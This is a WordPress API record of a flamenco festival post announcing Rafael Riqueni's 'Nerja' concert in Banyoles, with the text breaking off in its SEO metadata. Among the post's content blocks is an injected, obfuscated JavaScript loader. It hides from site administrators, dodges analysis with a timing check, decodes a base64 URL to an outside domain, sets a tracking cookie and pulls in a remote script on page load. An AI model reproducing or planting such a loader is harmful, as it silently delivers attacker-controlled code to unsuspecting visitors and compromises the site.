{"id":2861,"date":"2026-08-24T11:13:07","date_gmt":"2026-08-24T09:13:07","guid":{"rendered":"https:\/\/flamengi.cat\/?p=2861"},"modified":"2026-09-02T13:19:26","modified_gmt":"2026-09-02T11:19:26","slug":"rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles","status":"publish","type":"post","link":"https:\/\/flamengi.cat\/es\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\/","title":{"rendered":"RAFAEL RIQUENI \u201cNERJA\u201d<br> Domingo 15 de noviembre a las 18h en el Ateneo de Banyoles"},"content":{"rendered":"\n\t\t<div id=\"fws_6a9bcf5444fc5\"  data-column-margin=\"default\" data-midnight=\"dark\"  class=\"wpb_row vc_row-fluid vc_row full-width-content vc_row-o-equal-height vc_row-flex vc_row-o-content-top\"  style=\"padding-top: 0px; padding-bottom: 0px; \"><div class=\"row-bg-wrap\" data-bg-animation=\"none\" data-bg-animation-delay=\"\" data-bg-overlay=\"false\"><div class=\"inner-wrap row-bg-layer\" ><div class=\"row-bg viewport-desktop using-bg-color\"  style=\"background-color: #412939; \"><\/div><\/div><\/div><div class=\"row_col_wrap_12 col span_12 dark left\">\n\t<div  class=\"vc_col-sm-12 wpb_column column_container vc_column_container col centered-text padding-5-percent inherit_tablet inherit_phone \"  data-border-radius=\"10px\" data-padding-pos=\"all\" data-has-bg-color=\"false\" data-bg-color=\"\" data-bg-opacity=\"1\" data-animation=\"\" data-delay=\"0\" >\n\t\t<div class=\"vc_column-inner\" >\n\t\t\t<div class=\"wpb_wrapper\">\n\t\t\t\t<div class=\"nectar-cta  alignment_tablet_default alignment_phone_default display_tablet_inherit display_phone_inherit \" data-color=\"accent-color\" data-using-bg=\"true\" data-style=\"arrow-animation\" data-display=\"inline\" data-alignment=\"left\" data-text-color=\"custom\" ><h4 style=\"color: #ffffff;\"><span class=\"link_wrap\" style=\"padding-top: 20px; padding-right: 40px; padding-bottom: 20px; padding-left: 40px;\"><a target=\"_blank\" class=\"link_text\" href=\"https:\/\/cultura.banyoles.cat\/\"><span class=\"text\">Reserva d'entrades<\/span><svg class=\"next-arrow\" aria-hidden=\"true\" width=\"20px\" height=\"25px\" viewBox=\"0 0 50 80\" xml:space=\"preserve\">\n  <polyline stroke=\"#ffffff\" stroke-width=\"9\" fill=\"none\" stroke-linecap=\"round\" stroke-linejoin=\"round\" points=\"0, 0 45, 40 0, 80\"\/>\n  <\/svg>  <span class=\"line\"  style=\"background-color: #ffffff;\"><\/span> <\/a><\/span><\/h4><\/div>\n\t\t\t<\/div> \n\t\t<\/div>\n\t<\/div> \n<\/div><\/div>\n\t\t<div id=\"fws_6a9bcf5445994\"  data-column-margin=\"default\" data-midnight=\"dark\"  class=\"wpb_row vc_row-fluid vc_row\"  style=\"padding-top: 0px; padding-bottom: 0px; \"><div class=\"row-bg-wrap\" data-bg-animation=\"none\" data-bg-animation-delay=\"\" data-bg-overlay=\"false\"><div class=\"inner-wrap row-bg-layer\" ><div class=\"row-bg viewport-desktop\"  style=\"\"><\/div><\/div><\/div><div class=\"row_col_wrap_12 col span_12 dark left\">\n\t<div  class=\"vc_col-sm-12 wpb_column column_container vc_column_container col padding-2-percent inherit_tablet inherit_phone \"  data-padding-pos=\"all\" data-has-bg-color=\"false\" data-bg-color=\"\" data-bg-opacity=\"1\" data-animation=\"\" data-delay=\"0\" >\n\t\t<div class=\"vc_column-inner\" >\n\t\t\t<div class=\"wpb_wrapper\">\n\t\t\t\t\n<div class=\"wpb_text_column wpb_content_element \" >\n\t<div class=\"wpb_wrapper\">\n\t\t<p><strong>Rafael Riqueni<\/strong> \u00e9s, probablement, el millor compositor que ha donat mai el flamenc i, sens dubte, un dels guitarristes m\u00e9s destacats de la seva hist\u00f2ria. Aclamat per la cr\u00edtica, s&#8217;ha consolidat com un dels grans referents de la m\u00fasica espanyola contempor\u00e0nia.<\/p>\n<p>Nerja \u00e9s el nou treball discogr\u00e0fic de Rafael Riqueni, una obra que construeix una fantasia descriptiva des d&#8217;una estreta vinculaci\u00f3 amb la m\u00fasica cl\u00e0ssica, una influ\u00e8ncia que ha marcat bona part de la seva traject\u00f2ria. Concebut com un relat, Nerja explica la hist\u00f2ria del grup de joves que va descobrir la monumental Cova de Nerja l&#8217;any 1959 arran d&#8217;un fet fortu\u00eft. Riqueni interpreta els esdeveniments d&#8217;aquella nit a partir d&#8217;un fascinant concepte harm\u00f2nic que, en di\u00e0leg directe amb els elements propis del flamenc, amplia els horitzons de l&#8217;impressionisme musical.<\/p>\n<p><strong>Int\u00e8rprets:<\/strong> Rafael Riqueni<\/p>\n<p><strong>Tipologia:<\/strong> Guitarra flamenca<\/p>\n<p><strong>Data i hora:<\/strong> 15 de novembre a les 18 h<\/p>\n<p><strong>Espai:<\/strong> Ateneu de Banyoles<\/p>\n<p><strong>Preu de l&#8217;entrada:<\/strong> 12 \u20ac<\/p>\n<p><em><strong>Entrades a la venda a partir del dia 9 de setembre<\/strong><\/em><\/p>\n\t<\/div>\n<\/div>\n\n\n\n<div id=\"fws_6a9bcf5445f57\" data-midnight=\"\" data-column-margin=\"default\" class=\"wpb_row vc_row-fluid vc_row inner_row vc_row-o-equal-height vc_row-flex vc_row-o-content-middle\"  style=\"\"><div class=\"row-bg-wrap\"> <div class=\"row-bg\" ><\/div> <\/div><div class=\"row_col_wrap_12_inner col span_12  left\">\n\t<div style=\"\" class=\"vc_col-sm-12 wpb_column column_container vc_column_container col child_column padding-3-percent inherit_tablet inherit_phone \"  data-using-bg=\"true\" data-shadow=\"medium_depth\" data-border-radius=\"10px\" data-padding-pos=\"all\" data-has-bg-color=\"true\" data-bg-color=\"#573278\" data-bg-opacity=\"1\" data-animation=\"\" data-delay=\"0\" >\n\t\t<div class=\"vc_column-inner\" ><div class=\"column-bg-overlay-wrap column-bg-layer\" data-bg-animation=\"none\"><div class=\"column-bg-overlay\" style=\"opacity: 1; background-color: #573278;\"><\/div><\/div>\n\t\t<div class=\"wpb_wrapper\">\n\t\t\t\n<div class=\"wpb_text_column wpb_content_element \" >\n\t<div class=\"wpb_wrapper\">\n\t\t<h3 style=\"color: #ffffff;\">Data: 15 de Novembre<br \/>\n<span style=\"color: #ffffff;\">Hora:<\/span> 18:00h<br \/>\n<span style=\"color: #ffffff;\">Lloc: <\/span>\u00a0Ateneu de Banyoles<\/h3>\n\t<\/div>\n<\/div>\n\n\n\n\n\t\t<\/div> \n\t<\/div>\n\t<\/div> \n<\/div><\/div>\n\t\t\t<\/div> \n\t\t<\/div>\n\t<\/div> \n<\/div><\/div>\n\t\t<div id=\"fws_6a9bcf54466f4\"  data-column-margin=\"default\" data-midnight=\"dark\" data-top-percent=\"2%\" data-bottom-percent=\"2%\" data-nectar-animated-gradient-settings=\"{&quot;color_1&quot;:&quot;#f1e5c1&quot;,&quot;color_2&quot;:&quot;#f1e5c1&quot;,&quot;speed&quot;:&quot;1300&quot;,&quot;blending_mode&quot;:&quot;linear&quot;}\"  class=\"wpb_row vc_row-fluid vc_row full-width-content vc_row-o-equal-height vc_row-flex vc_row-o-content-top  top_margin_5pct scale_desktop_1-02 rotate_desktop_2deg nectar-overflow-hidden\"  style=\"padding-top: calc(100vw * 0.02); padding-bottom: calc(100vw * 0.02); \"><div class=\"row-bg-wrap has-animated-gradient\" data-bg-animation=\"none\" data-bg-animation-delay=\"\" data-bg-overlay=\"false\"><div class=\"inner-wrap row-bg-layer\" ><div class=\"row-bg viewport-desktop using-bg-color\"  style=\"background-color: #c7e7e8; \"><\/div><\/div><div class=\"row-bg-overlay row-bg-layer\" style=\"\"><\/div><\/div><div class=\"row_col_wrap_12 col span_12 dark left\">\n\t<div  class=\"vc_col-sm-12 wpb_column column_container vc_column_container col no-extra-padding el_spacing_0px inherit_tablet inherit_phone \"  data-padding-pos=\"all\" data-has-bg-color=\"false\" data-bg-color=\"\" data-bg-opacity=\"1\" data-animation=\"\" data-delay=\"0\" data-scroll-animation=\"true\" data-scroll-animation-movement=\"transform_x\" data-scroll-animation-mobile=\"true\" data-scroll-animation-intensity=\"-2.5\" >\n\t\t<div class=\"vc_column-inner\" >\n\t\t\t<div class=\"wpb_wrapper\">\n\t\t\t\t<div class=\"nectar-scrolling-text font_size_4vw font_size_mobile_9vw text_space_medium \" data-style=\"default\" data-s-dir=\"rtl\" data-spacing=\"true\" data-outline-thickness=\"thin\" data-s-speed=\"slowest\" data-overflow=\"visible\" ><div class=\"nectar-scrolling-text-inner\" style=\"color: #ffffff;\">\n<h2>RAFAEL RIQUENI \u201cNERJA\u201d | Diumenge 15 de novembre<\/h2>\n\n<h2>RAFAEL RIQUENI \u201cNERJA\u201d | Diumenge 15 de novembre<\/h2>\n\n<h2>RAFAEL RIQUENI \u201cNERJA\u201d | Diumenge 15 de novembre<\/h2>\n\n<h2>RAFAEL RIQUENI \u201cNERJA\u201d | Diumenge 15 de novembre<\/h2>\n\n<h2>RAFAEL RIQUENI \u201cNERJA\u201d | Diumenge 15 de novembre<\/h2>\n<\/div><\/div>\n\t\t\t<\/div> \n\t\t<\/div>\n\t<\/div> \n<\/div><\/div>\n\t\t<div id=\"fws_6a9bcf5446de5\"  data-column-margin=\"default\" data-midnight=\"dark\" data-top-percent=\"2%\" data-bottom-percent=\"2%\" data-nectar-animated-gradient-settings=\"{&quot;color_1&quot;:&quot;#f1e5c1&quot;,&quot;color_2&quot;:&quot;#f1e5c1&quot;,&quot;speed&quot;:&quot;1300&quot;,&quot;blending_mode&quot;:&quot;linear&quot;}\"  class=\"wpb_row vc_row-fluid vc_row full-width-content vc_row-o-equal-height vc_row-flex vc_row-o-content-top  bottom_margin_5pct zindex-set scale_desktop_1-02 rotate_desktop_358deg nectar-overflow-hidden\"  style=\"padding-top: calc(100vw * 0.02); padding-bottom: calc(100vw * 0.02);  z-index: 20;\"><div class=\"row-bg-wrap has-animated-gradient\" data-bg-animation=\"none\" data-bg-animation-delay=\"\" data-bg-overlay=\"false\"><div class=\"inner-wrap row-bg-layer\" ><div class=\"row-bg viewport-desktop using-bg-color\"  style=\"background-color: #c7e7e8; \"><\/div><\/div><\/div><div class=\"row_col_wrap_12 col span_12 dark left\">\n\t<div  class=\"vc_col-sm-12 wpb_column column_container vc_column_container col no-extra-padding el_spacing_0px inherit_tablet inherit_phone \"  data-padding-pos=\"all\" data-has-bg-color=\"false\" data-bg-color=\"\" data-bg-opacity=\"1\" data-animation=\"\" data-delay=\"0\" data-scroll-animation=\"true\" data-scroll-animation-movement=\"transform_x\" data-scroll-animation-mobile=\"true\" data-scroll-animation-intensity=\"2.5\" >\n\t\t<div class=\"vc_column-inner\" >\n\t\t\t<div class=\"wpb_wrapper\">\n\t\t\t\t<div class=\"nectar-scrolling-text font_size_4vw font_size_mobile_9vw text_space_medium \" data-style=\"default\" data-s-dir=\"ltr\" data-spacing=\"true\" data-outline-thickness=\"thin\" data-s-speed=\"slowest\" data-overflow=\"visible\" ><div class=\"nectar-scrolling-text-inner\" style=\"color: #ffffff;\">\n<h2>RAFAEL RIQUENI \u201cNERJA\u201d | Diumenge 15 de novembre<\/h2>\n\n<h2>RAFAEL RIQUENI \u201cNERJA\u201d | Diumenge 15 de novembre<\/h2>\n\n<h2>RAFAEL RIQUENI \u201cNERJA\u201d | Diumenge 15 de novembre<\/h2>\n\n<h2>RAFAEL RIQUENI \u201cNERJA\u201d | Diumenge 15 de novembre<\/h2>\n\n<h2>RAFAEL RIQUENI \u201cNERJA\u201d | Diumenge 15 de novembre<\/h2>\n<\/div><\/div>\n\t\t\t<\/div> \n\t\t<\/div>\n\t<\/div> \n<\/div><\/div>\n\t\t<div id=\"fws_6a9bcf5447481\"  data-column-margin=\"default\" data-midnight=\"dark\"  class=\"wpb_row vc_row-fluid vc_row\"  style=\"padding-top: 0px; padding-bottom: 0px; \"><div class=\"row-bg-wrap\" data-bg-animation=\"none\" data-bg-animation-delay=\"\" data-bg-overlay=\"false\"><div class=\"inner-wrap row-bg-layer\" ><div class=\"row-bg viewport-desktop\"  style=\"\"><\/div><\/div><\/div><div class=\"row_col_wrap_12 col span_12 dark left\">\n\t<div  class=\"vc_col-sm-12 wpb_column column_container vc_column_container col padding-3-percent inherit_tablet inherit_phone \"  data-padding-pos=\"all\" data-has-bg-color=\"false\" data-bg-color=\"\" data-bg-opacity=\"1\" data-animation=\"\" data-delay=\"0\" >\n\t\t<div class=\"vc_column-inner\" >\n\t\t\t<div class=\"wpb_wrapper\">\n\t\t\t\t\n\t<div class=\"wpb_gallery wpb_content_element clearfix\">\n\t\t<div class=\"wpb_wrapper\"><div class=\"wpb_gallery_slidesnectarslider_style\" data-onclick=\"link_no\" data-interval=\"5\"><div class=\"nectar-slider-wrap\" style=\"height: 667pxpx\" data-flexible-height=\"\" data-overall_style=\"classic\" data-button-styling=\"btn_with_count\" data-fullscreen=\"false\"  data-full-width=\"false\" data-parallax=\"false\" data-autorotate=\"5500\" id=\"ns-id-6a9bcf5447d57\"><div class=\"swiper-container\" style=\"height: 667pxpx\"  data-loop=\"true\" data-height=\"667px\" data-bullets=\"\" data-bullet_style=\"see_through\" data-arrows=\"true\" data-desktop-swipe=\"true\" data-settings=\"\"><div class=\"swiper-wrapper\"><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/2.-Manuel-Naranjo-1.jpg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/3.-Manuel-Naranjo.jpg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><div class=\"swiper-slide\" data-bg-alignment=\"center\" data-color-scheme=\"light\" data-x-pos=\"centered\" data-y-pos=\"middle\"><div class=\"image-bg\" style=\"background-image: url(https:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/Cartel.-Documental-Riqueni.jpg);\">  &nbsp; <\/div><span class=\"ie-fix\"><\/span> <\/div><!--\/swiper-slide--><\/div><a href=\"\" class=\"slider-prev\"><i class=\"icon-salient-left-arrow\"><\/i> <div class=\"slide-count\"> <span class=\"slide-current\">1<\/span> <i class=\"icon-salient-right-line\"><\/i> <span class=\"slide-total\"><\/span> <\/div> <\/a>\n\t\t\t     \t\t<a href=\"\" class=\"slider-next\"><i class=\"icon-salient-right-arrow\"><\/i> <div class=\"slide-count\"> <span class=\"slide-current\">1<\/span> <i class=\"icon-salient-right-line\"><\/i> <span class=\"slide-total\"><\/span> <\/div> <\/a><div class=\"nectar-slider-loading\"><\/div><\/div><\/div><\/div>\n\t\t<\/div> \n\t<\/div> \n\t\t\t<\/div> \n\t\t<\/div>\n\t<\/div> \n<\/div><\/div>\n\t\t<div id=\"fws_6a9bcf547998f\"  data-column-margin=\"default\" data-midnight=\"dark\"  class=\"wpb_row vc_row-fluid vc_row\"  style=\"padding-top: 0px; padding-bottom: 0px; \"><div class=\"row-bg-wrap\" data-bg-animation=\"none\" data-bg-animation-delay=\"\" data-bg-overlay=\"false\"><div class=\"inner-wrap row-bg-layer\" ><div class=\"row-bg viewport-desktop\"  style=\"\"><\/div><\/div><\/div><div class=\"row_col_wrap_12 col span_12 dark left\">\n\t<div  class=\"vc_col-sm-12 wpb_column column_container vc_column_container col no-extra-padding inherit_tablet inherit_phone \"  data-padding-pos=\"all\" data-has-bg-color=\"false\" data-bg-color=\"\" data-bg-opacity=\"1\" data-animation=\"\" data-delay=\"0\" >\n\t\t<div class=\"vc_column-inner\" >\n\t\t\t<div class=\"wpb_wrapper\">\n\t\t\t\t\n<div class=\"wpb_text_column wpb_content_element \" >\n\t<div class=\"wpb_wrapper\">\n\t\t<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')&#091;0&#093;||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n\t<\/div>\n<\/div>\n\n\n\n\n\t<div class=\"wpb_video_widget wpb_content_element vc_clearfix   vc_video-aspect-ratio-169 vc_video-el-width-100 vc_video-align-left\" >\n\t\t<div class=\"wpb_wrapper\">\n\t\t\t\n\t\t\t<div class=\"wpb_video_wrapper\"><iframe loading=\"lazy\" title=\"&quot;Esa Noche&quot; en el Festival de Jazz de Barcelona, 06\/11\/21.\" width=\"1080\" height=\"608\" src=\"https:\/\/www.youtube.com\/embed\/emUrZx9skYw?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe><\/div>\n\t\t<\/div>\n\t<\/div>\n\n\t<div class=\"wpb_video_widget wpb_content_element vc_clearfix   vc_video-aspect-ratio-169 vc_video-el-width-100 vc_video-align-left\" >\n\t\t<div class=\"wpb_wrapper\">\n\t\t\t\n\t\t\t<div class=\"wpb_video_wrapper\"><iframe loading=\"lazy\" title=\"Rafael Riqueni, &quot;Al Ni\u00f1o Miguel&quot; en Flamenco E\u00f1e 2019\" width=\"1080\" height=\"608\" src=\"https:\/\/www.youtube.com\/embed\/t-ps7XHBamo?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe><\/div>\n\t\t<\/div>\n\t<\/div>\n\n\t\t\t<\/div> \n\t\t<\/div>\n\t<\/div> \n<\/div><\/div>\n","protected":false},"excerpt":{"rendered":"Reserva d'entrades Rafael Riqueni \u00e9s, probablement, el millor compositor que ha donat mai el flamenc i, sens dubte, un dels guitarristes m\u00e9s destacats de la seva hist\u00f2ria. Aclamat per la...","protected":false},"author":4,"featured_media":2865,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[122],"tags":[],"class_list":["post-2861","post","type-post","status-publish","format-standard","has-post-thumbnail","category-edicio-2026"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v19.5 (Yoast SEO v27.8) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>FLAMENGI FESTIVAL<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/flamengi.cat\/es\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"RAFAEL RIQUENI \u201cNERJA\u201d Diumenge 15 de novembre a les 18h a l&#039;Ateneu de Banyoles\" \/>\n<meta property=\"og:url\" content=\"https:\/\/flamengi.cat\/es\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\/\" \/>\n<meta property=\"og:site_name\" content=\"FLAMENGI FESTIVAL\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/flamengi.festival\" \/>\n<meta property=\"article:published_time\" content=\"2026-08-24T09:13:07+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-09-02T11:19:26+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/2.-Manuel-Naranjo.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"534\" \/>\n\t<meta property=\"og:image:height\" content=\"800\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Neoserveis\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@flamengif\" \/>\n<meta name=\"twitter:site\" content=\"@flamengif\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Neoserveis\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/flamengi.cat\\\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/flamengi.cat\\\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\\\/\"},\"author\":{\"name\":\"Neoserveis\",\"@id\":\"https:\\\/\\\/flamengi.cat\\\/#\\\/schema\\\/person\\\/99252030689047d68b309be665c89c41\"},\"headline\":\"RAFAEL RIQUENI \u201cNERJA\u201d Diumenge 15 de novembre a les 18h a l&#8217;Ateneu de Banyoles\",\"datePublished\":\"2026-08-24T09:13:07+00:00\",\"dateModified\":\"2026-09-02T11:19:26+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/flamengi.cat\\\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\\\/\"},\"wordCount\":1700,\"image\":{\"@id\":\"https:\\\/\\\/flamengi.cat\\\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/flamengi.cat\\\/wp-content\\\/uploads\\\/2026\\\/08\\\/2.-Manuel-Naranjo.jpg\",\"articleSection\":[\"Edici\u00f3 2026\"],\"inLanguage\":\"es\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/flamengi.cat\\\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\\\/\",\"url\":\"https:\\\/\\\/flamengi.cat\\\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\\\/\",\"name\":\"RAFAEL RIQUENI \u201cNERJA\u201d Diumenge 15 de novembre a les 18h a l'Ateneu de Banyoles - FLAMENGI FESTIVAL\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/flamengi.cat\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/flamengi.cat\\\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/flamengi.cat\\\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/flamengi.cat\\\/wp-content\\\/uploads\\\/2026\\\/08\\\/2.-Manuel-Naranjo.jpg\",\"datePublished\":\"2026-08-24T09:13:07+00:00\",\"dateModified\":\"2026-09-02T11:19:26+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/flamengi.cat\\\/#\\\/schema\\\/person\\\/99252030689047d68b309be665c89c41\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/flamengi.cat\\\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/flamengi.cat\\\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/flamengi.cat\\\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\\\/#primaryimage\",\"url\":\"https:\\\/\\\/flamengi.cat\\\/wp-content\\\/uploads\\\/2026\\\/08\\\/2.-Manuel-Naranjo.jpg\",\"contentUrl\":\"https:\\\/\\\/flamengi.cat\\\/wp-content\\\/uploads\\\/2026\\\/08\\\/2.-Manuel-Naranjo.jpg\",\"width\":534,\"height\":800},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/flamengi.cat\\\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Inici\",\"item\":\"https:\\\/\\\/flamengi.cat\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"RAFAEL RIQUENI \u201cNERJA\u201d Diumenge 15 de novembre a les 18h a l&#8217;Ateneu de Banyoles\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/flamengi.cat\\\/#website\",\"url\":\"https:\\\/\\\/flamengi.cat\\\/\",\"name\":\"FLAMENGI FESTIVAL\",\"description\":\"Festival Flamenc de Girona\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/flamengi.cat\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/flamengi.cat\\\/#\\\/schema\\\/person\\\/99252030689047d68b309be665c89c41\",\"name\":\"Neoserveis\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d8d15510fd9d2ea0dab012c24b4fd873280996e13c5f523dcfe6d9310d6cd5ac?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d8d15510fd9d2ea0dab012c24b4fd873280996e13c5f523dcfe6d9310d6cd5ac?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d8d15510fd9d2ea0dab012c24b4fd873280996e13c5f523dcfe6d9310d6cd5ac?s=96&d=mm&r=g\",\"caption\":\"Neoserveis\"},\"url\":\"https:\\\/\\\/flamengi.cat\\\/es\\\/author\\\/neoserveis\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"FLAMENGI FESTIVAL","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/flamengi.cat\/es\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\/","og_locale":"es_ES","og_type":"article","og_title":"RAFAEL RIQUENI \u201cNERJA\u201d Diumenge 15 de novembre a les 18h a l'Ateneu de Banyoles","og_url":"https:\/\/flamengi.cat\/es\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\/","og_site_name":"FLAMENGI FESTIVAL","article_publisher":"https:\/\/www.facebook.com\/flamengi.festival","article_published_time":"2026-08-24T09:13:07+00:00","article_modified_time":"2026-09-02T11:19:26+00:00","og_image":[{"width":534,"height":800,"url":"http:\/\/flamengi.cat\/wp-content\/uploads\/2026\/08\/2.-Manuel-Naranjo.jpg","type":"image\/jpeg"}],"author":"Neoserveis","twitter_card":"summary_large_image","twitter_creator":"@flamengif","twitter_site":"@flamengif","twitter_misc":{"Escrito por":"Neoserveis","Tiempo de lectura":"6 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/flamengi.cat\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\/#article","isPartOf":{"@id":"https:\/\/flamengi.cat\/rafael-riqueni-nerja-diumenge-15-de-novembre-a-les-18h-a-lateneu-de-banyoles\/"},"author":{"name":"Neoserveis","@id":"https:\/\/flamengi.cat\/#\/schema\/person\/99252030689047d68b309be665c89c41"},"headline":"RAFAEL RIQUENI \u201cNERJA\u201d Diumenge 15 de novembre a les 18h a l&#8217;Ateneu de 